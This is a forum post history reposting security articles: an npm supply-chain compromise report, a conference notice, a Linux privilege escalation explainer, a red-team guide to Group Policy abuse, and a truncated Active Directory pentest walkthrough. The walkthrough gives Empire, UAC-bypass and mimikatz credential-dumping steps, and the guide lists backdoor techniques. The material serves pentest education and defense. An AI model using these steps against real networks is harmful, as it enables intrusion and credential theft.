Everything posted by Nytro

  1. By Catalin Cimpanu July 12, 2018 12:10 PM

A hacker has gained access to a developer's npm account and injected malicious code into a popular JavaScript library, code that was designed to steal the npm credentials of users who utilize the poisoned package inside their projects. The JavaScript (npm) package that got compromised is called eslint-scope, a sub-module of the more famous ESLint, a JavaScript code analysis toolkit.

Hacker gained access to a developer's npm account

The hack took place on the night between July 11 and 12, according to the results of a preliminary investigation posted on GitHub a few hours ago. "One of our maintainers did observe that a new npm token was generated overnight (said maintainer was asleep)," said Kevin Partington, ESLint project member. Partington believes the hacker used the newly-generated npm token to authenticate and push a new version of the eslint-scope library on the npm repository of JavaScript packages. The malicious version was eslint-scope 3.7.2, which the maintainers of the npm repository have recently taken offline.

Malicious code steals npm credentials

"The published code seems to steal npm credentials, so we do recommend that anyone who might have installed this version change their npm password and (if possible) revoke their npm tokens and generate new ones," Partington recommended for developers who used eslint-scope. In an email to Bleeping Computer, npm CTO C.J. Silverio put the incident into perspective. "We determined that access tokens for approximately 4,500 accounts could have been obtained before we acted to close this vulnerability. However, we have not found evidence that any tokens were actually obtained or used to access any npmjs.com account during this window," Silverio said. "As a precautionary measure, npm has revoked every access token that had been created prior to 2:30 pm UTC (7:30 am California time) today. This measure requires every registered npm user to re-authenticate to npmjs.com and generate new access tokens, but it ensures that there is no way for this morning’s vulnerability to persist or spread. We are additionally conducting a full forensic analysis to confirm that no other accounts were accessed or used to publish unauthorized code. "This morning’s incident did not happen because of an npmjs.com breach, but because of a breach elsewhere that exposed a publisher’s npm credentials. To mitigate this risk, we encourage every npmjs.com user to enable two-factor authentication, with which this morning’s incident would have been impossible," Silverio added. The developer who had his account compromised has changed his npm password, enabled two-factor authentication, and generated new tokens to access his existing npm libraries. The incident is significant because the stolen npm credentials can be used in the same way as in this attack: the hacker can use any of the stolen npm credentials to poison other JavaScript libraries that are made available via npm — a.k.a. the Node Package Manager, the semi-official package manager for the JavaScript ecosystem.

Similar incidents have happened in the past year

This is the third incident in the past year in which a hacker has inserted malicious code into an npm package. The first such incident happened in August 2017 when the npm team removed 38 JavaScript npm packages that were caught stealing environment variables from infected projects. In May 2018, someone tried to hide a backdoor in another popular npm package named getcookies.
Similar incidents with malware ending up in package repositories have happened with Python's PyPI [1, 2], Docker Hub, Arch Linux AUR, and the Ubuntu Store.

UPDATE July 13, 02:45 AM ET: The ESLint team has published the final results of their investigation. They say that besides the eslint-scope 3.7.2 package, the attacker also compromised another package, eslint-config-eslint, pushing out a malicious module eslint-config-eslint 5.0. Article updated with comments from npm CTO C.J. Silverio. Sursa: https://www.bleepingcomputer.com/news/security/compromised-javascript-package-caught-stealing-npm-credentials/
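If you want to check whether a project on disk pulled in the compromised release, a minimal Python sketch like the one below walks the node_modules tree and reports installed eslint-scope versions. It only assumes the standard npm directory layout and is an illustration, not an official detection tool.

#!/usr/bin/env python3
# Report installed eslint-scope versions under a project directory.
import json
import sys
from pathlib import Path

root = Path(sys.argv[1] if len(sys.argv) > 1 else ".")
for pkg_json in root.rglob("node_modules/eslint-scope/package.json"):
    version = json.loads(pkg_json.read_text())["version"]
    note = "  <-- compromised version" if version == "3.7.2" else ""
    print(f"{pkg_json.parent}: eslint-scope {version}{note}")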
  2. OWASP Bucharest AppSec Conference 2018 - October 25th - 26th

The OWASP Bucharest team is happy to announce the OWASP Bucharest AppSec Conference 2018, a two-day security and hacking conference with additional training days dedicated to application security. It will take place between the 25th and 26th of October 2018 in Bucharest, Romania. The objective of the OWASP Bucharest AppSec Conference is to raise awareness about application security and to bring high-quality security content provided by renowned professionals in the European region. Everyone is free to participate in OWASP and all our materials are available under a free and open software license.

Call for papers is now open! Please submit your talk proposal. Call for trainings is now open! Please submit your training proposal.

Important dates
- Call for papers deadline: 24th of September
- Call for trainings deadline: 24th of September
- The final agenda will be published after 1st of October 2018
- CTF qualifiers will be on 29th of September
- CTF final will be on 25th of October
- Conference trainings and CTF day is 25th of October 2018
- Conference presentation tracks and workshops day is 26th of October 2018

Who Should Attend?
- Application Developers
- Application Testers and Quality Assurance
- Application Project Management and Staff
- Chief Information Officers, Chief Information Security Officers, Chief Technology Officers, Deputies, Associates and Staff
- Chief Financial Officers, Auditors, and Staff Responsible for IT Security Oversight and Compliance
- Security Managers and Staff
- Executives, Managers, and Staff Responsible for IT Security Governance
- IT Professionals interested in improving IT Security
- Anyone interested in learning about or promoting Web Application Security

CONFERENCE (Friday 26th of October)
Date: Friday 26th of October, 8.00 AM
Venue Location: Hotel Caro (workshops: Hotel Caro)
Venue Address: 164A Barbu Vacarescu Blvd., 2nd District, 020285 Bucharest, Romania

Price and registration
The conference entrance is FREE; you need to register on the link provided below, print your ticket, and present it at the entrance. The training sessions are paid. The workshops and CTF attendance are free of charge. Registration is open; limited number of seats!

Details: https://www.owasp.org/index.php/OWASP_Bucharest_AppSec_Conference_2018
  3. Understanding Linux Privilege Escalation and Defending Against It

Table of Contents
- What is Linux privilege escalation?
- How to escalate privileges?
- It is all about enumeration
- Linux enumeration
- Exploiting the weakness
- How an attacker exploits software
- Example of a privilege escalation attack
- How do you defend against privilege escalation?
- Reduce the information leaked by applications
- Remove compilers or restrict access to them
- Apply Linux updates and patches
- Run file integrity monitoring software
- Perform system auditing
- Privilege escalation checkers
- Conclusion

What is Linux privilege escalation?

Privilege escalation is the process of elevating your permission level by switching from one user to another and gaining more privileges. For example, a normal user on Linux can become root or get the same permissions as root. This can be authorized usage, with the use of the su or sudo command. It can also be unauthorized, for example when an attacker leverages a software bug. This last category of privilege escalations is especially interesting to understand, so we can better defend our Linux systems.

How to escalate privileges?

Attackers who try to obtain additional privileges often use so-called exploits. Exploits are pieces of code whose goal is to deliver a particular payload. The payload will focus on a known weakness in the operating system or running software components. This may result in the software crashing or giving access to unexpected areas of memory. By overwriting segments of memory and executing specially crafted (shell) code, one may gain a successful privilege escalation. These are the steps an attacker usually takes:
- Find a vulnerability
- Create the related exploit
- Use the exploit on a system
- Check if it successfully exploits the system
- Gain additional privileges

It is all about enumeration

The first step is to find a weakness or vulnerability in the system. To learn about any weaknesses you have to know what operating system and version is used. This is done with a process called enumeration. Within this process, you try to learn as much as possible about a network and its systems. Attackers find more information by using Google, port scanning, and studying the responses of requests from applications. With each step, more information becomes available. A similar approach is taken by penetration testers (pentesters), attackers with a legal contract to do so. During this enumeration phase, the attacker can also determine if any compilers are available. If not, there might be high-level programming languages like Perl or Python available instead. This information is useful for a later stage, in which exploit code is used. As part of enumeration, a lot of data will be collected. Every finding has to be stored, so it can be retrieved and processed later. Each piece of information can be used to search for known vulnerabilities, or other entries into the system. For example, when Apache is used, and the version number is listed, we can search for known vulnerabilities for that particular version.

Linux enumeration

For most operating systems and applications there are dedicated tools to help. Linux enumeration tools focus specifically on retrieving data from several key areas. These include directories that store the system configuration or its status, like /etc and /proc. There are several system administration tools available that will retrieve network details, file locations, or the system version.
Examples include: /etc, /proc, ifconfig, lsof, netstat, uname (a small Python sketch of this step appears later in this post).

Exploiting the weakness

The next stage is about exploiting any weaknesses found. Sometimes ready-to-use code can be executed against the target, resulting in some level of access. Your WordPress installation (or a plugin) might be outdated, which may give an external visitor the permissions to upload files. The attacker can use this to plant a custom PHP script, to collect more information from the system. This is done by using specific PHP functions, like system(), to execute commands on the system itself.

How an attacker exploits software

The exploit process may take different steps before the right level of access is gained. Just being able to upload a file might be harmless to the system. So with every step, the attacker tries to retrieve more information and adjust any required exploit. Sometimes a vulnerability might be there, but not exploitable. This can be due to additional defense layers (e.g. memory randomization). The attacker has to adapt to the specifics of the machine.

Example of a privilege escalation attack

To show how an attacker may become root, let’s have a look at an example. Let’s assume the following: we have a Linux system running CentOS, with Apache and a WordPress website on it. Like most WordPress installations, it has several plugins installed. The webmaster had a busy period and did not update the plugins for a while. This is how a privilege escalation attack could go:
- The attacker runs an automated script to detect this outdated plugin on many systems across the internet
- The automated script picks up on the presence of the plugin on the system and checks if it is version 1.2.4
- The attacker verifies the finding (or weeds out any false positives)
- The attacker manually abuses the weakness in the plugin and via that uploads a custom PHP file to the system
- The attacker now requests to run this PHP script, to retrieve more data on the system
- The output of the script reveals the availability of a compiler
- The script also finds an outdated Linux kernel, which has a known exploit to become root for non-privileged users
- A small C program is uploaded via the plugin
- The compiler is executed to compile the specific piece of C code into a binary program
- The program is executed to abuse the Linux privilege escalation bug in the kernel
- A new user is added to the system by the attacker
- The attacker can now log in to the system via SSH

This is just an example of how a small piece of information is used during enumeration and followed up for later processing. The process is then repeated several times to find more details about the system until the attacker gains full root permissions.

How do you defend against privilege escalation?

The best way to counter Linux privilege escalations is by using the common “defense in depth” method. You apply several defenses, each targeting a specific area. If one layer of defense fails, this doesn’t necessarily mean your system can be compromised. That is obviously easier said than done, so let’s have a look at some of the measures.

Reduce the information leaked by applications

Most applications have an application banner. This can be a greeting message with details about the application, like its name and version number. While it may look innocent, it is better to avoid giving away too much information. Especially leaking version numbers should be prevented.
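Before continuing with the remaining defensive measures, here is the small Python sketch referenced earlier: a minimal illustration (not part of the original article) of the local enumeration step, collecting kernel and distribution information and checking whether a compiler is present. It only reads standard locations and is not a full enumeration tool.

#!/usr/bin/env python3
# Minimal local enumeration sketch: kernel, distribution, and compiler availability.
import platform
import shutil
from pathlib import Path

print("Kernel release:", platform.release())        # roughly `uname -r`

for info_file in ("/etc/os-release", "/proc/version"):
    path = Path(info_file)
    if path.is_file():                               # distribution / kernel build info
        print(f"--- {info_file} ---")
        print(path.read_text().strip())

for compiler in ("gcc", "cc", "clang"):              # is a compiler available on PATH?
    location = shutil.which(compiler)
    if location:
        print("Compiler found:", location)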
See also: Hiding the nginx version number; WordPress hardening and reduce information disclosure.

Remove compilers or restrict access to them

The presence of a compiler is not needed on most systems. Production systems should only have a compiler available when it is absolutely necessary. As attackers often need a compiler to successfully build an exploit, removing compilers is definitely a good step.

Apply Linux updates and patches

Systems often get compromised due to weaknesses in software components. There are actually multiple suggestions in this area. First of all, subscribe to mailing lists to know what kind of vulnerabilities were found recently. The next step is to run updates on a regular basis and keep your systems up-to-date. Also, apply security updates automatically when possible, for example using unattended-upgrades on Debian and Ubuntu systems.

Run file integrity monitoring software

The best way to detect a privilege escalation or breach is by monitoring important system files. If one of them changes unexpectedly, this may be an indication of a security issue. This monitoring can be achieved with a file integrity monitoring (FIM) solution. Popular options include AIDE or the Linux audit framework (auditd).

Perform system auditing

Maybe the best thing one can do is run security audits continuously. For Linux systems, consider a tool like rkhunter or ClamAV to do malware scanning. Use Lynis for an in-depth security scan of the system. While Lynis is intended as a defensive tool, it can actually find things that are related to privilege escalation. Think of issues like cronjobs that are writable or software banners being shown. For that reason, Lynis is also used by pentesters in their work. System auditing may actually reveal unexpected vulnerabilities that the usual vulnerability scanners could not find.

Privilege escalation checkers

Some tools can help you check whether a privilege escalation is possible. This can be a useful exercise to learn how privilege escalations work. They will also help you check if your Linux systems are vulnerable to a particular type of privilege escalation and take counter-measures.
- unix-privesc-check – Gather information and determine possible attacks
- LinEnum – Perform enumeration and check for possible Linux privilege escalation options
Have a look at the privilege escalation tools on Linux Security Expert for more options and more extensive reviews.

Conclusion

Linux privilege escalation can happen due to one or more failing security layers. An attacker has to start with enumeration and process the resulting data. He or she will continue testing as more information becomes available. This repeats until one of the security defenses gets penetrated. Applying proper security defenses is your first safeguard against these attacks. They become much stronger if all defenses are in place, like minimizing the data you share, applying security updates, and monitoring the systems. Sursa: https://linux-audit.com/understanding-linux-privilege-escalation-and-defending-against-it/
  4. A Red Teamer’s Guide to GPOs and OUs April 2, 2018 / 2 Comments Intro Active Directory is a vast, complicated landscape comprised of users, computers, and groups, and the complex, intertwining permissions and privileges that connect them. The initial release of BloodHound focused on the concept of derivative local admin, then BloodHound 1.3 introduced ACL-based attack paths. Now, with the release of BloodHound 1.5, pentesters and red-teamers can easily find attack paths that include abusing control of Group Policy, and the objects that those Group Policies effectively apply to. In this blog post, I’ll recap how GPO (Group Policy Object) enforcement works, how to use BloodHound to find GPO-control based attack paths, and explain a few ways to execute those attacks. Prior Work Lucas Bouillot and Emmanuel Gras included GPO control and OU structure in their seminal work, “Chemins de contrôle en environnement Active Directory”. They used an attack graph to map which principals could take control of GPOs, and which OUs those GPOs applied to, then chased that down to the objects affected by those GPOs. We learned a lot from Lucas and Emannuel’s white paper (in French), and I’d highly recommend you read it as well. There are several important authors and resources we leaned on when figuring out how GPO works, in no particular order: the Microsoft Group Policy team’s posts on TechNet, Sean Metcalf’s work at adsecurity.org, 14-time Microsoft MVP “GPO Guy” Darren Mar-Elia, Microsoft’s Group Policy functional specification, and last but certainly not least, Will Schroeder’s seminal blog post on Abusing GPO Permissions. Special extra thanks to Darren Mar-Elia for answering a lot of my questions about Group Policy. Thanks, Darren! Other resources and references are linked at the bottom of this blog post. The Moving Parts of Group Policy There’s no two ways about it: GPO enforcement is a complicated beast with a lot of moving parts. With that said, let’s start at the very basics with the vocabulary used in the rest of the post, and build up to explaining how those moving parts interact with one another: GPO: A Group Policy Object. When an Active Directory domain is first created, two GPOs are created as well: “Default Domain Policy” and “Default Domain Controllers”. GPOs contain sets of policies that affect computers and users. For example, you can use a GPO policy to control the Windows desktop background on computers. GPOs are visible in the Group Policy Management GUI here: Above: The list of GPOs in our test domain. Technically, “Default Domain Controllers Policy” is the display name of the GPO, while the name of the GPO is a GPO curly braced “GUID”. I put “GUID” in quotation marks because this identifier is not actually globally unique. The “Default Domain Controllers Policy” in every Active Directory domain will have the same “name” (read: curly braced GUID): {6AC1786C-016F-11D2-945F-00C04fB984F9}. For this reason, GPOs have an additional parameter called objectguid, which actually is globally unique. The policy files for any given GPO reside in the domain SYSVOL at the policy’s gpcfilesyspath (ex: \\contoso.local\sysvol\contoso.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}). Above: The relevant properties of the “Default Domain Controllers Policy” GPO, and that GPO’s policy files location in the SYSVOL. OU: An Organizational Unit. 
According to Microsoft’s TechNet, OUs are “general-purpose container that can be used to group most other object classes together for administrative purposes”. Basically, OUs are containers that you place principals (users, groups, and computers) into. Organizations will commonly use OUs to organize principals based on department and/or geographic location. Additionally, OUs can of course be nested within other OUs. This usually results in a relatively complex OU tree structure within a domain, which can be difficult to navigate without first being very familiar with the tree. You can see OUs in the ADUC (Active Directory Users and Computers) GUI. In the below screenshot, “ContosoUsers” is a child OU of the CONTOSO.LOCAL domain, “Helpdesk” is a child OU within the “ContosoUsers” OU, and “Alice Admin” is a child user of the “Helpdesk” OU: Above: The Alice Admin user within the OU tree. GpLink: A Group Policy Link. GPOs can be “linked” to domains, sites, and OUs. By default, a GPO that is linked to an OU will apply to the child objects of that OU. For example, the “Default Domain Policy” GPO is linked, by default, to the domain object, while the “Default Domain Controllers Policy” is linked, by default, to the Domain Controllers OU. In the below screenshot, you can see that if we expand the “contoso.local” domain and the “Domain Controllers” OU, the GPOs linked to those objects appear below them: Above: The “Default Domain Policy” is linked to the domain “contoso.local”. The “Default Domain Controllers” policy is linked to the “Domain Controllers” OU. GpLinks are stored on the objects the GPO is linked to, on the attribute called “gplink”. The format of the “gplink” attribute value is [<Distinguished name of the GPO>;<0 if the link is not enforced, 1 if the link is enforced>]. You can easily enumerate those links with PowerView as in the example below: Above: The “Default Domain Controllers Policy” GPO is linked to the “Domain Controllers” OU, and is not enforced. Those three pieces — GPOs, OUs, and GpLinks — comprise the major moving parts we’re working with. It’s important to know those three pieces well before understanding GPO enforcement logic and how to use BloodHound to find attack paths, so make sure you feel confident with those before continuing on. One last note: GPOs can also be linked to sites, but at this time we’re not including that due to complications with site memberships and collection challenges. GPO Enforcement Logic Now that you know the basic moving parts, let’s look more closely at how they connect. GPO enforcement logic, very briefly, works like this: GpLinks can be enforced, or not. OUs can block inheritance, or not. If a GpLink is enforced, the associated GPO will apply to the linked OU and all child objects, regardless of whether any OU in that tree blocks inheritance. If a GpLink is not enforced, the associated GPO will apply to the linked OU and all child objects, unless any OU within that tree blocks inheritance. (A small Python sketch of this apply/do-not-apply decision appears at the end of this post.) There are further complications on top of this, which we’ll get to later on. First though, let’s visualize the above rules regarding GpLink enforcement and OUs blocking inheritance. Recall earlier I had a user called Alice Admin within a HelpDesk OU. Instead of looking at that in ADUC, though, let’s start to think about this as a graph: Above: Alice Admin within the domain/OU tree. The domain object, Contoso.Local, is a container object. It contains the OU called ContosoUsers. The OU ContosoUsers contains the OU HelpDesk.
Finally, the OU HelpDesk contains the user Alice Admin. Now, let’s add our Default Domain Policy GPO into the mix. Recall from earlier that in my test domain, that GPO is linked to the domain object: Above: The “Default Domain Policy” GPO is linked to the domain object. Now, in default circumstances, you can simply read from left to right to figure out that the Default Domain Policy will apply to the user Alice Admin. The “default circumstance” here is that the GpLink relationship is not enforced, and that none of the containers in this path block inheritance. Let’s add that information to the above graph: In this circumstance, it doesn’t matter that the GpLink edge is not enforced, as none of the OUs block inheritance. In our test domain, we have another OU under ContosoUsers called “Accounting”, with one user in that OU: Bob User. For example’s sake, we’ll say that the Accounting OU does block inheritance. Let’s add that to our existing graph: Again, we can see that the Default Domain Policy GPO is linked to the domain object, and Bob User is contained within the OU tree under the domain object; however, because the OU “Accounting” blocks inheritance, and because the GpLink edge is not enforced, the Default Domain Policy will not apply to Bob User. Still with me? You’d be forgiven for being slightly confused at this point, but don’t worry, it gets worse! Let’s add another GPO to the mix and link it to the domain object as well, except this time we will enforce the GpLink: Our new GPO called “Custom Password Policy” is linked to the domain object, which again contains the entire OU tree under it. Now, because the GPLink is enforced, this policy will apply to all child objects in the OU tree, regardless of whether any of those OUs block inheritance. This means that the “Custom Password Policy” GPO will apply to both “Alice Admin” and “Bob User”, despite the “Accounting” OU blocking inheritance. In our experience, this information is going to cover 95%+ of situations you’ll run into in real enterprise networks; however, there are three more things to know about, which may impact you when abusing GPO control paths during your pentests and red team assessments: WMI filtering, security filtering, and Group Policy link order and precedence. WMI filtering allows administrators to further limit which computers and users a GPO will apply to, based on whether a certain WMI query returns True or False. For example, when a computer is processing group policy, it may run a WMI query that checks if the operating system is Windows 7, and only apply the group policy if that query returns true. See Darren Mar-Elia’s excellent blog post for further details. Security filtering allows administrators to further limit which principals a GPO will apply to. Administrators can limit the GPO to apply to specific computers, users, or the members of a specific security group. By default, every GPO applies to the “Authenticated Users” principal, which includes any principal that successfully authenticates to the domain. For more details, see this post on the TechGenix site. Group Policy link order dictates which Group Policy “wins” in the event of conflicting, non-merging policies. Imagine you have two “Password Policy” GPOs: one that requires users to change their password every 30 days, and one that requires users to change their password every 60 days. Whichever policy is higher in the precedence order is the policy that will “win”. 
The group policy client enforces this “win” condition by processing policies in reverse order of precedence, so the highest precedence policy is processed last, and “wins”. Luckily, you don’t need to worry about this for almost every abuse primitive. For more information, check out this blog post. Like I said above, our experience has been that in real enterprise networks, you won’t need to worry about WMI filtering, security filtering, or GpLink order in 95% or more of the situations you run into, but I mention them so you know where to start troubleshooting if your abuse actions aren’t working. We may try to roll those three items into the BloodHound interface in the future. In the meantime, make sure your target computer and user objects won’t be filtered out by WMI or security filters, and that you don’t attempt to push an evil group policy that will be overruled by a higher precedence policy. Analysis with BloodHound First, make sure you are running at least BloodHound 1.5.1. Second, do your standard SharpHound collection like you always have, but this time either do the “All” or “Containers” and “ACL” collection methods, which will collect GPO ACLs and OU structure for you: C:\> SharpHound.exe -c All Then, import the resulting acls.csv, container_gplinks.csv, and container_structure.csv through the BloodHound interface like normal. Now you’re ready to start analyzing outbound and inbound GPO control against objects. For example, let’s take a look at our “Alice Admin” user. If we search for this user, then click on the user node, you’ll see some new information in the user tab, including “Effective Inbound GPOs”: Above: Two GPOs apply to Alice Admin. The Cypher query that generates this number does the GpLink enforcement and OU blocking inheritance logic for you, so you don’t need to worry about working that out yourself. Simply click on the number “2”, in this instance, to visualize the GPOs that apply to “Alice Admin”: Above: How the two GPOs apply to Alice Admin. Notice the edge connecting “Default Domain Policy” to the “Contoso.Local” domain is dotted. This means that this GPO is not enforced; however, all of the “Contains” edges are solid, meaning that none of those containers block inheritance. Recall from earlier that unenforced GpLinks will only be affected by OUs that block inheritance, so in this case, the Default Domain Policy still applies to Alice Admin. Also note that the edge connecting “Custom Password Policy” to the “Contoso.Local” domain is solid. This means that this GPO is enforced, and will therefore apply to all child objects regardless of whether any subsequent containers block inheritance. We can also see the flip side of this — what objects does any given GPO effectively apply to? First, let’s check out the Custom Password Policy GPO: Above: The Custom Password Policy GPO applies to 3 computers and 5 users. Reminder: GPOs can only apply to users and computers, not security groups. By clicking on the numbers, you can render the objects affected by this GPO, and how the GPO applies to those objects. If we click the “5” next to “User Objects”, we get this graph: Above: How the Custom Password Policy GPO applies to user objects. There are two important things to point out here: again, the edge connecting the “Custom Password Policy” GPO to the “Contoso.Local” domain object is solid, meaning this GPO is enforced. Second, notice the edge connecting the “Accounting” OU to the “Bob User” user is dotted, indicating the “Accounting” OU blocks inheritance.
But, because the “Custom Password Policy” GPO is enforced, the OU blocking inheritance doesn’t matter, and will be applied to the “Bob User” user anyway. Compare the above graph to the graph we get if we do the same for the “Default Domain Policy”: Above: The users affected by the “Default Domain Policy” GPO. Notice how the “Bob User” user is no longer there? That’s because the “Default Domain Policy” GPO is not enforced. Because the “Accounting” OU blocks inheritance, that GPO will not apply to the “Bob User” user. Alright, let’s put it all together and see if we can find an attack path from “Bob User” to “Alice Admin”. In the BloodHound search bar, click the path finding icon, then select your source node and target node. Hit enter, and BloodHound will find and render an attack path, if one exists: Above: The attack path from “Bob User” to “Alice Admin”. Reading this graph from left to right, we can see that “Bob User” is in a group called “Accounting”, which is part of a group called “Group Policy Admins” (believe me when I say crazier things have happened in the wild, and remember this is a contrived example :). The “Group Policy Admins” group has, as you would imagine, full control of the “Custom Password Policy” GPO. That GPO is then linked to the “Contoso.Local” domain. From here we have a couple options – push an evil policy down to the “Administrator” user and take over “Alice Admin” with an ACL based attack or just push an evil policy down directly to the “Alice Admin” user. Abusing GPO Control Finally, the most important part of this entire topic: how to actually take over computers and users with control over the GPOs that affect those users. For a bit of background and inspiration, read Will’s excellent blog post on abusing GPO rights, which contains information about the first proof-of-concept GPO abuse cmdlet that I’m aware of, New-GPOImmediateTask. When people say “you can do anything with GPO”, they really mean it: you can do anything with GPO. Will and I put together this list of abuses against computers, including the policy location and abuse, just to give you a few ideas: Policy Location: Computer Configuration\Preferences\Control Panel Settings\Folder Options Abuse: Create/alter file type associations, register DDE actions with those associations. Policy Location: Computer Configuration\Preferences\Control Panel Settings\Local Users and Groups Abuse: Add new local admin account. Policy Location: Computer Configuration\Preferences\Control Panel Settings\Scheduled Tasks Abuse: Deploy a new evil scheduled task (ie: PowerShell download cradle). Policy Location: Computer Configuration\Preferences\Control Panel Settings\Services Abuse: Create and configure new evil services. Policy Location: Computer Configuration\Preferences\Windows Settings\Files Abuse: Affected computers will download a file from the domain controller. Policy Location: Computer Configuration\Preferences\Windows Settings\INI Files Abuse: Update existing INI files. Policy Location: Computer Configuration\Preferences\Windows Settings\Registry Abuse: Update specific registry keys. Very useful for disabling security mechanisms, or triggering code execution in any number of ways. Policy Location: Computer Configuration\Preferences\Windows Settings\Shortcuts Abuse: Deploy a new evil shortcut. Policy Location: Computer Configuration\Policies\Software Settings\Software installation Abuse: Deploy an evil MSI. The MSI must be available to the GP client via a network share. 
Policy Location: Computer Configuration\Policies\Windows Settings\Scripts (startup/shutdown) Abuse: Configure and deploy evil startup scripts. Can run scripts out of GPO directory, can also run PowerShell commands with arguments Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Audit Policy Abuse: Modify local audit settings. Useful for evading detection. Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\User Rights Assignment\ Abuse: Grant a user the right to logon via RDP, grant a user SeDebugPrivilege, grant a user the right to load device drivers, grant a user seTakeOwnershipPrivilege. Basically, take over the remote computer without ever being an administrator on it. Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Registry Abuse: Alter DACLs on registry keys, grant yourself an extremely hard to find backdoor on the system. Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Windows Firewall Abuse: Manage the Windows firewall. Open up ports if they’re blocked. Policy Location: Computer Configuration\Preferences\Windows Settings\Environment Abuse: Add UNC path for DLL side loading. Policy Location: Computer Configuration\Preferences\Windows Settings\Files Abuse: Copy a file from a remote UNC path. So, that’s all well and good, but how do we actually take these actions? Currently, you’ve got two options: download and install the Group Policy Management Console and use the GPMC GUI to modify the relevant GPO or manually craft the relevant policy file and correctly modify the GPO and gpt.ini file. As an example, let’s say you want to push a new immediate scheduled task to a computer or user. My current understanding (which is definitely subject to correction), based on testing and the Microsoft Group Policy Preferences functional spec, follows: Whenever a group policy client (user or computer) checks for updated group policy, they will go through several steps to collect and apply Group Policy to themselves. The client will check whether the remote version of the GPO is greater than the locally cached version of that GPO (unless gpupdate /force is used). The remote version of the GPO is stored in two locations: As an integer value for the versionNumber attribute on the Group Policy Object itself. As the same integer in the GPT.INI file, located at \\<domain.com>\Policies\<gpo name>\GPT.ini. Note that the “name” of the GPO is not the display name. For instance, the “name” for the Default Domain Policy is {6AC1786C-016F-11D2-945F-00C04fB984F9}. If the remote GPO version number is greater than the locally cached version, the group policy client will continue, analyzing which policies and/or preferences it needs to search for in the relevant SYSVOL directory. For Group Policy preferences (which scheduled tasks fall under), the group policy client will check to see which Client-Side Extensions (CSEs) exist as part of the “gPCMachineExtensionNames” and “gPCUserExtensionNames” attributes. 
According to the Microsoft Group Policy Preferences functional spec, CSE GUIDs “enable a specific client-side extension on the Group Policy client to be associated with policy data that is stored in the logical and physical components of a Group Policy Object (GPO) on the Group Policy server, for that particular extension.” The CSE GUIDs for Immediate Scheduled tasks, as they would be stored in the “gPCMachineExtensionNames” attribute, are: [{00000000-0000-0000-0000-000000000000}{79F92669-4224-476C-9C5C-6EFB4D87DF4A}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}] And in a slightly more readable format: [ {00000000-0000-0000-0000-000000000000} {79F92669-4224-476C-9C5C-6EFB4D87DF4A} {CAB54552-DEEA-4691-817E-ED4A4D1AFC72} ] [ {AADCED64-746C-4633-A97C-D61349046527} {CAB54552-DEEA-4691-817E-ED4A4D1AFC72} ] This translates to the following: [ {Core GPO Engine} {Preference Tool CSE GUID Local users and groups} {Preference Tool CSE GUID Scheduled Tasks} ] [ {Preference CSE GUID Scheduled Tasks} {Preference Tool CSE GUID Scheduled Tasks} ] Once the group policy client understands that there are some scheduled tasks that apply to it, it will search for a file in the GP directory called ScheduledTasks.xml. That file exists in a predictable location: \\<domain.com>\sysvol\<domain.com>\Policies\<gpo-name>\Machine\Preferences\ScheduledTasks.xml Finally, the group policy client will parse the ScheduledTasks.xml and register the task locally. That’s how the process works, as I understand it. There is still a lot of work to be done on crafting scripts to automate the GPO abuse process, as installing GPMC is rarely a great option while on a red team assessment. If ever there were a call to arms, this is it: we’ll continue working on creating scripts that reliably automate GPO control abuse, but are equally as excited to see what people in the community can come up with as well. Conclusion As Rohan mentioned in his post, BloodHound 1.5 represents a pretty big milestone for the BloodHound project. By adding in GPOs and OU structure, we’re greatly increasing the scope of Active Directory attack surface you can easily map out with BloodHound. In a future blog post, I’ll focus more on the defensive side of things, showing how defenders can use BloodHound to analyze and reduce the attack surface in AD now that we’re tracking GPOs and OU structure. BloodHound is available free and open source on GitHub at https://github.com/BloodHoundAD/BloodHound You can join us on Slack at the official BloodHound Gang Slack here: https://bloodhoundgang.herokuapp.com/ Also published on Medium. Sursa: https://wald0.com/?p=179
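This is the small Python sketch referenced in the enforcement logic section above: a minimal, hypothetical model of the apply/do-not-apply decision for a GPO linked at the top of a container chain. It is not how BloodHound or the Group Policy client implements it, and it deliberately ignores WMI filtering, security filtering, and link order, as discussed earlier; the field names are illustrative, not real AD attributes.

# Hypothetical sketch of the GPO enforcement decision described in this post.
# container_chain lists the containers from the link point down to the object.
def gpo_applies(link_enforced, container_chain):
    if link_enforced:
        # Enforced links ignore "block inheritance" on every OU in the chain.
        return True
    # Unenforced links are cut off if any OU in the chain blocks inheritance.
    return not any(ou["blocks_inheritance"] for ou in container_chain)

chain_to_alice = [{"name": "ContosoUsers", "blocks_inheritance": False},
                  {"name": "HelpDesk", "blocks_inheritance": False}]
chain_to_bob = [{"name": "ContosoUsers", "blocks_inheritance": False},
                {"name": "Accounting", "blocks_inheritance": True}]

print(gpo_applies(False, chain_to_alice))  # Default Domain Policy -> Alice Admin: True
print(gpo_applies(False, chain_to_bob))    # Default Domain Policy -> Bob User: False
print(gpo_applies(True, chain_to_bob))     # Custom Password Policy -> Bob User: True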
  5. Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin In the previous two articles, I gathered local user credentials and escalated to local administrator, and my next step is getting to domain admin. Since I have local admin, I’ll be using a tool called Bloodhound that will map out the entire domain for me and show where my next target will be. After getting Bloodhound running on my Windows host machine (here’s a guide), I then identify a server, 2008R2SERV, that the domain admin, Jaddmon, is logged into. For a guide to setting up and running Bloodhound, view my write-up here. My first step is to try and use Crackmapexec to invoke Mimikatz and dump the credentials, but SMB on this machine is not allowing logins, so I have to find another way around. Since I have local admin rights, I go ahead and RDP into the server where I then use Empire to get a foothold on the server. Using Empire is easy: First I start up empire and then start a listener, like below Once the listener is started, I then type launcher powershell http to generate a powershell payload that will talk back to my listener. I copy this long command, switch to the RDP session and open a command prompt and paste it. When it runs, I see in Empire that I now have an agent on that machine. To interact with it, I first type agents Then interact VLLRZY4EC (or whatever your agent name is) Even though I’m local admin, I still have to bypass UAC. Luckily, there’s a module for this in Empire. I then type usemodule privesc/bypassuac and then set Listener http and then run it. I then get another agent on the machine and yet again, I interact with that new agent. Now I dump the credentials by typing mimikatz It does its thing and gives a messy output, but this can be made 